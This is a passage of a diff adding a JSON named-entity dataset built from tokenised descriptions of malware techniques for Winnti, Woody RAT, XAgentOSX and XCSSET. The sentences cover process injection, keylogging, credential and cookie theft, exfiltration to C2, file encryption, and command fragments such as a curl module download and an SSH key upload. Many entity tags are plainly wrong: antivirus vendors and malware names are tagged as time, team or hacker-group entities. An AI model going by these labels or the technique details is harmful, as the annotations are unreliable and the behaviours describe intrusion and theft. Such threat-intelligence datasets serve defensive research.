+ "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "has", + "the", + "ability", + "to", + "use", + "encapsulated", + "HTTP/S", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "for", + "Windows", + "sets", + "its", + "DLL", + "file", + "as", + "a", + "new", + "service", + "in", + "the", + "Registry", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "is", + "believed", + "that", + "a", + "patch", + "management", + "system", + "for", + "an", + "anti-virus", + "product", + "commonly", + "installed", + "among", + "targeted", + "companies", + "was", + "used", + "to", + "distribute", + "the", + "Wiper", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "identify", + "administrator", + "accounts", + "on", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "use", + "RSA-4096", + "to", + "encrypt", + "data", + "sent", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "collect", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "deobfuscate", + "Base64-encoded", + "strings", + "and", + "scripts." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "used", + "Base64", + "encoded", + "strings", + "and", + "scripts." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "exfiltrate", + "files", + "from", + "an", + "infected", + "machine", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "relied", + "on", + "CVE-2022-30190", + "(Follina)", + "for", + "execution", + "during", + "delivery." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "the", + "ability", + "to", + "delete", + "itself", + "from", + "disk", + "by", + "creating", + "a", + "suspended", + "notepad", + "process", + "and", + "writing", + "shellcode", + "to", + "delete", + "a", + "file", + "into", + "the", + "suspended", + "process", + "using", + "`NtWriteVirtualMemory`." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "list", + "all", + "files", + "and", + "their", + "associated", + "attributes,", + "including", + "filename,", + "type,", + "owner,", + "creation", + "time,", + "last", + "access", + "time,", + "last", + "write", + "time,", + "size,", + "and", + "permissions." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "suppressed", + "all", + "error", + "reporting", + "by", + "calling", + "`SetErrorMode`", + "with", + "0x8007", + "as", + "a", + "parameter." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "download", + "files", + "from", + "its", + "C2", + "server,", + "including", + "the", + ".NET", + "DLLs,", + "`WoodySharpExecutor`", + "and", + "`WoodyPowerSession`." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "make", + "`Ping`", + "GET", + "HTTP", + "requests", + "to", + "its", + "C2", + "server", + "at", + "regular", + "intervals", + "for", + "network", + "connectivity", + "checks." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "relied", + "on", + "users", + "opening", + "a", + "malicious", + "email", + "attachment", + "for", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "use", + "multiple", + "native", + "APIs,", + "including", + "`WriteProcessMemory`,", + "`CreateProcess`,", + "and", + "`CreateRemoteThread`", + "for", + "process", + "injection." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "execute", + "PowerShell", + "commands", + "and", + "scripts", + "with", + "the", + "use", + "of", + ".NET", + "DLL,", + "`WoodyPowerSession`." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "call", + "`NtQuerySystemProcessInformation`", + "with", + "`SystemProcessInformation`", + "to", + "enumerate", + "all", + "running", + "processes,", + "including", + "associated", + "information", + "such", + "as", + "PID,", + "parent", + "PID,", + "image", + "name,", + "and", + "owner." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "create", + "a", + "suspended", + "notepad", + "process", + "and", + "write", + "shellcode", + "to", + "delete", + "a", + "file", + "into", + "the", + "suspended", + "process", + "using", + "`NtWriteVirtualMemory`." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "inject", + "code", + "into", + "a", + "targeted", + "process", + "by", + "writing", + "to", + "the", + "remote", + "memory", + "of", + "an", + "infected", + "system", + "and", + "then", + "create", + "a", + "remote", + "thread." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "search", + "registry", + "keys", + "to", + "identify", + "antivirus", + "programs", + "on", + "an", + "compromised", + "host." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "the", + "ability", + "to", + "take", + "a", + "screenshot", + "of", + "the", + "infected", + "host", + "desktop", + "using", + "Windows", + "GDI+." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "detect", + "Avast", + "Software,", + "Doctor", + "Web,", + "Kaspersky,", + "AVG,", + "ESET,", + "and", + "Sophos", + "antivirus", + "programs." + ], + "ner_tags": [ + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "B-Way", + "B-Tool", + "I-Tool", + "O", + "B-Time", + "B-Way", + "B-Time", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "collect", + ".NET,", + "PowerShell,", + "and", + "Python", + "information", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "B-SamFile", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "has", + "been", + "delivered", + "via", + "malicious", + "Word", + "documents", + "and", + "archive", + "files." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "use", + "AES-CBC", + "to", + "encrypt", + "data", + "sent", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "retrieve", + "the", + "following", + "information", + "from", + "an", + "infected", + "machine:", + "OS,", + "architecture,", + "computer", + "name,", + "OS", + "build", + "version,", + "environment", + "variables,", + "and", + "storage", + "drives." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "retrieve", + "network", + "interface", + "and", + "proxy", + "information." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "retrieve", + "a", + "list", + "of", + "user", + "accounts", + "and", + "usernames", + "from", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "communicate", + "with", + "its", + "C2", + "server", + "using", + "HTTP", + "requests." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Woody", + "RAT", + "can", + "execute", + "commands", + "using", + "`cmd.exe`." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "getFirefoxPassword", + "function", + "to", + "attempt", + "to", + "locate", + "Firefox", + "passwords." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "deletFileFromPath", + "function", + "to", + "delete", + "a", + "specified", + "file", + "using", + "the", + "NSFileManager:removeFileAtPath", + "method." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "ftpUpload", + "function", + "to", + "use", + "the", + "FTPManager:uploadFile", + "method", + "to", + "upload", + "files", + "from", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "readFiles", + "function", + "to", + "return", + "a", + "detailed", + "listing", + "(sometimes", + "recursive)", + "of", + "a", + "specified", + "directory.", + "XAgentOSX", + "contains", + "the", + "showBackupIosFolder", + "function", + "to", + "check", + "for", + "IOS", + "device", + "backups", + "by", + "running", + "<code>ls", + "-la", + "~/Library/Application\\", + "Support/MobileSync/Backup/</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "keylogging", + "functionality", + "that", + "will", + "monitor", + "for", + "active", + "application", + "windows", + "and", + "write", + "them", + "to", + "the", + "log,", + "it", + "can", + "handle", + "special", + "characters,", + "and", + "it", + "will", + "buffer", + "by", + "default", + "50", + "characters", + "before", + "sending", + "them", + "out", + "over", + "the", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "execFile", + "function", + "to", + "execute", + "a", + "specified", + "file", + "on", + "the", + "system", + "using", + "the", + "NSTask:launch", + "method." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "getProcessList", + "function", + "to", + "run", + "<code>ps", + "aux</code>", + "to", + "get", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "takeScreenShot", + "(along", + "with", + "startTakeScreenShot", + "and", + "stopTakeScreenShot)", + "functions", + "to", + "take", + "screenshots", + "using", + "the", + "CGGetActiveDisplayList,", + "CGDisplayCreateImage,", + "and", + "NSImage:initWithCGImage", + "methods." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "getInstalledAPP", + "function", + "to", + "run", + "<code>ls", + "-la", + "/Applications</code>", + "to", + "gather", + "what", + "applications", + "are", + "installed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XAgentOSX", + "contains", + "the", + "getInfoOSX", + "function", + "to", + "return", + "the", + "OS", + "X", + "version", + "as", + "well", + "as", + "the", + "current", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "attempts", + "to", + "discover", + "accounts", + "from", + "various", + "locations", + "such", + "as", + "a", + "user's", + "Evernote,", + "AppleID,", + "Telegram,", + "Skype,", + "and", + "WeChat", + "data." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "will", + "compress", + "entire", + "<code>~/Desktop</code>", + "folders", + "excluding", + "all", + "<code>.git</code>", + "folders,", + "but", + "only", + "if", + "the", + "total", + "data", + "size", + "is", + "under", + "200MB." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "a", + "malicious", + "browser", + "application", + "to", + "replace", + "the", + "legitimate", + "browser", + "in", + "order", + "to", + "continuously", + "capture", + "credentials,", + "monitor", + "web", + "traffic,", + "and", + "download", + "additional", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "adds", + "malicious", + "code", + "to", + "a", + "host's", + "Xcode", + "projects", + "by", + "enumerating", + "CocoaPods", + "<code>target_integrator.rb</code>", + "files", + "under", + "the", + "<code>/Library/Ruby/Gems</code>", + "folder", + "or", + "enumerates", + "all", + "<code>.xcodeproj</code>", + "folders", + "under", + "a", + "given", + "directory.", + "XCSSET", + "then", + "downloads", + "a", + "script", + "and", + "Mach-O", + "file", + "into", + "the", + "Xcode", + "project", + "folder." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "performs", + "AES-CBC", + "encryption", + "on", + "files", + "under", + "<code>~/Documents</code>,", + "<code>~/Downloads</code>,", + "and", + "<code>~/Desktop</code>", + "with", + "a", + "fixed", + "key", + "and", + "renames", + "files", + "to", + "give", + "them", + "a", + "<code>.enc</code>", + "extension.", + "Only", + "files", + "with", + "sizes", + "less", + "than", + "500MB", + "are", + "encrypted." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "collects", + "contacts", + "and", + "application", + "data", + "from", + "files", + "in", + "Desktop,", + "Documents,", + "Downloads,", + "Dropbox,", + "and", + "WeChat", + "folders." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "adds", + "malicious", + "file", + "paths", + "to", + "the", + "<code>DYLD_FRAMEWORK_PATH</code>", + "and", + "<code>DYLD_LIBRARY_PATH</code>", + "environment", + "variables", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "exfiltrates", + "data", + "stolen", + "from", + "a", + "system", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "has", + "used", + "a", + "zero-day", + "exploit", + "in", + "the", + "ssh", + "launchdaemon", + "to", + "elevate", + "privileges", + "and", + "bypass", + "SIP." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "has", + "used", + "`mdfind`", + "to", + "enumerate", + "a", + "list", + "of", + "apps", + "known", + "to", + "grant", + "screen", + "sharing", + "permissions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "XCSSET", + "prompts", + "the", + "user", + "to", + "input", + "credentials", + "using", + "a", + "native", + "macOS", + "dialog", + "box", + "leveraging", + "the", + "system", + "process", + "<code>/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "has", + "dropped", + "a", + "malicious", + "applet", + "into", + "an", + "app's", + "`.../Contents/MacOS/`", + "folder", + "of", + "a", + "previously", + "launched", + "app", + "to", + "bypass", + "Gatekeeper's", + "security", + "checks", + "on", + "first", + "launch", + "apps", + "(prior", + "to", + "macOS", + "13)." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "a", + "hidden", + "folder", + "named", + "<code>.xcassets</code>", + "and", + "<code>.git</code>", + "to", + "embed", + "itself", + "in", + "Xcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "downloads", + "browser", + "specific", + "AppleScript", + "modules", + "using", + "a", + "constructed", + "URL", + "with", + "the", + "<code>curl</code>", + "command,", + "<code>https://\"", + "&", + "domain", + "&", + "\"/agent/scripts/\"", + "&", + "moduleName", + "&", + "\".applescript</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "the", + "ssh", + "launchdaemon", + "to", + "elevate", + "privileges,", + "bypass", + "system", + "controls,", + "and", + "enable", + "remote", + "access", + "to", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "loads", + "a", + "system", + "level", + "launchdaemon", + "using", + "the", + "<code>launchctl", + "load", + "-w</code>", + "command", + "from", + "<code>/System/Librarby/LaunchDaemons/ssh.plist</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "the", + "<code>chmod", + "+x</code>", + "command", + "to", + "grant", + "executable", + "permissions", + "to", + "the", + "malicious", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "builds", + "a", + "malicious", + "application", + "bundle", + "to", + "resemble", + "Safari", + "through", + "using", + "the", + "Safari", + "icon", + "and", + "<code>Info.plist</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "the", + "<code>plutil</code>", + "command", + "to", + "modify", + "the", + "<code>LSUIElement</code>,", + "<code>DFBundleDisplayName</code>,", + "and", + "<code>CFBundleIdentifier</code>", + "keys", + "in", + "the", + "<code>/Contents/Info.plist</code>", + "file", + "to", + "change", + "how", + "XCSSET", + "is", + "visible", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "will", + "create", + "an", + "ssh", + "key", + "if", + "necessary", + "with", + "the", + "<code>ssh-keygen", + "-t", + "rsa", + "-f", + "$HOME/.ssh/id_rsa", + "-P</code>", + "command.", + "XCSSET", + "will", + "upload", + "a", + "private", + "key", + "file", + "to", + "the", + "server", + "to", + "remotely", + "access", + "the", + "host", + "without", + "a", + "password." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "saves", + "a", + "screen", + "capture", + "of", + "the", + "victim's", + "system", + "with", + "a", + "numbered", + "filename", + "and", + "<code>.jpg</code>", + "extension.", + "Screen", + "captures", + "are", + "taken", + "at", + "specified", + "intervals", + "based", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "searches", + "firewall", + "configuration", + "files", + "located", + "in", + "<code>/Library/Preferences/</code>", + "and", + "uses", + "<code>csrutil", + "status</code>", + "to", + "determine", + "if", + "System", + "Integrity", + "Protection", + "is", + "enabled." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "<code>ps", + "aux</code>", + "with", + "the", + "<code>grep</code>", + "command", + "to", + "enumerate", + "common", + "browsers", + "and", + "system", + "processes", + "potentially", + "impacting", + "XCSSET's", + "exfiltration", + "capabilities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "<code>scp</code>", + "to", + "access", + "the", + "<code>~/Library/Cookies/Cookies.binarycookies</code>", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "RC4", + "encryption", + "over", + "TCP", + "to", + "communicate", + "with", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "identifies", + "the", + "macOS", + "version", + "and", + "uses", + "<code>ioreg</code>", + "to", + "determine", + "serial", + "number." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "AppleScript", + "to", + "check", + "the", + "host's", + "language", + "and", + "location", + "with", + "the", + "command", + "<code>user", + "locale", + "of", + "(get", + "system", + "info)</code>." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "the", + "machine's", + "local", + "time,", + "XCSSET", + "waits", + "43200", + "seconds", + "(12", + "hours)", + "from", + "the", + "initial", + "creation", + "timestamp", + 